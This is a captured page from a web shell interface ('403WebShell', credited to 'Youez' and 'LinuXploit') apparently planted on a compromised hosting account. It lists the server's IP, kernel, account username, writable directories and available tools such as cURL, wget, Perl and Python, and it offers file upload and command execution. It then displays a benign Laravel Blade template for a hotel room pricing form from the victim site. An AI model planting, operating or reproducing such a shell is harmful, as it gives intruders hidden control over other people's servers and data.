Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.107.223
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/storage/framework/views/d8cb29e8eb1a8ac27c08d91e7d61997ea09deb0d.php
<?php if(is_default_lang()): ?>
    <div class="row">
        <div class="col-md-6">
            <div class="form-group">
                <label><?php echo e(__("Price")); ?> <span class="text-danger">*</span></label>
                <input type="number" required value="<?php echo e($row->price); ?>" min="1" placeholder="<?php echo e(__("Price")); ?>" name="price" class="form-control">
            </div>
        </div>
        <div class="col-md-6">
            <div class="form-group">
                <label><?php echo e(__("Number of room")); ?> <span class="text-danger">*</span></label>
                <input type="number" required value="<?php echo e($row->number ?? 1); ?>" min="1" max="100" placeholder="<?php echo e(__("Number")); ?>" name="number" class="form-control">
            </div>
        </div>
    </div>
    <hr>
    <?php if(is_default_lang()): ?>
        <div class="row">
            <div class="col-lg-12">
                <div class="form-group">
                    <label class="control-label"><?php echo e(__("Minimum day stay requirements")); ?></label>
                    <input type="number" name="min_day_stays" class="form-control" value="<?php echo e($row->min_day_stays); ?>" placeholder="<?php echo e(__("Ex: 2")); ?>">
                    <i><?php echo e(__("Leave blank if you dont need to set minimum day stay option")); ?></i>
                </div>
            </div>
        </div>
        <hr>
    <?php endif; ?>

    <div class="row">
        <div class="col-md-6">
            <div class="form-group">
                <label><?php echo e(__("Number of beds")); ?> </label>
                <input type="number"  value="<?php echo e($row->beds ?? 1); ?>" min="1" max="10" placeholder="<?php echo e(__("Number")); ?>" name="beds" class="form-control">
            </div>
        </div>
        <div class="col-md-6">
            <div class="form-group">
                <label><?php echo e(__("Room Size")); ?> </label>
                <div class="input-group mb-3">
                    <input type="text" class="form-control" name="size" value="<?php echo e($row->size ?? 0); ?>" placeholder="<?php echo e(__("Room size")); ?>" >
                    <div class="input-group-append">
                        <span class="input-group-text" ><?php echo size_unit_format(); ?></span>
                    </div>
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="form-group">
                <label><?php echo e(__("Max Adults")); ?> </label>
                <input type="number" min="1"  value="<?php echo e($row->adults ?? 1); ?>"  name="adults" class="form-control">
            </div>
        </div>
        <div class="col-md-6">
            <div class="form-group">
                <label><?php echo e(__("Max Children")); ?> </label>
                <input type="number" min="0"  value="<?php echo e($row->children ?? 0); ?>"  name="children" class="form-control">
            </div>
        </div>
    </div>
    <hr>
<?php endif; ?><?php /**PATH /home/book24/public_html/modules/Hotel/Views/admin/room/form-detail/pricing.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit